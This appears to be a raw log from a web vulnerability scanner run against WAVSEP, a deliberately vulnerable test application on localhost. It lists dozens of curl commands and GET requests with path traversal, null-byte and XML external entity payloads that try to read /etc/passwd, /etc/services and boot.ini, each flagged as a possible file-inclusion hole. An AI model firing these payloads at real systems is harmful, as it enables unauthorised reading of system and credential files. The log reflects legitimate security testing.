curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
